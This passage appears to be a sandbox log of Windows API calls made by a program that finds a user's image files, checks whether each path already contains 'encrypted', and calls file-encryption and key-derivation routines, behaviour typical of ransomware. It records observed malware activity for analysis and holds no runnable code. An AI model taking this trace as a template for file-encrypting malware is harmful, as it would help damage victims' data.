ftCreationTime.dwHighDateTime=0x1d5bb38, ftLastAccessTime.dwLowDateTime=0x7e736a90, ftLastAccessTime.dwHighDateTime=0x1d5ba54, ftLastWriteTime.dwLowDateTime=0x7e736a90, ftLastWriteTime.dwHighDateTime=0x1d5ba54, nFileSizeHigh=0x0, nFileSizeLow=0x14127, dwReserved0=0x0, dwReserved1=0x777648, cFileName="K_hrf3du.bmp", cAlternateFileName="")) returned 0x7c20c0 [0039.835] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.835] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ci\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ssAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sAfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AfKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fKs-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ks-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mGDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GDt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dt6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pjw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jw\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hrf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rf3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f3du.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.838] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.838] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0039.838] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.838] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.838] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.838] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.838] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.838] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.838] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba1552e0, ftCreationTime.dwHighDateTime=0x1d5bb38, ftLastAccessTime.dwLowDateTime=0x7e736a90, ftLastAccessTime.dwHighDateTime=0x1d5ba54, ftLastWriteTime.dwLowDateTime=0x7e736a90, ftLastWriteTime.dwHighDateTime=0x1d5ba54, nFileSizeHigh=0x0, nFileSizeLow=0x14127, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="K_hrf3du.bmp", cAlternateFileName="")) returned 0x7c2240 [0039.838] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0039.838] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.838] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.838] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0039.839] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0039.839] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.839] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.839] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0039.840] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0039.840] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.840] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0039.840] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.840] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.840] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.840] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.840] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.840] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.840] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 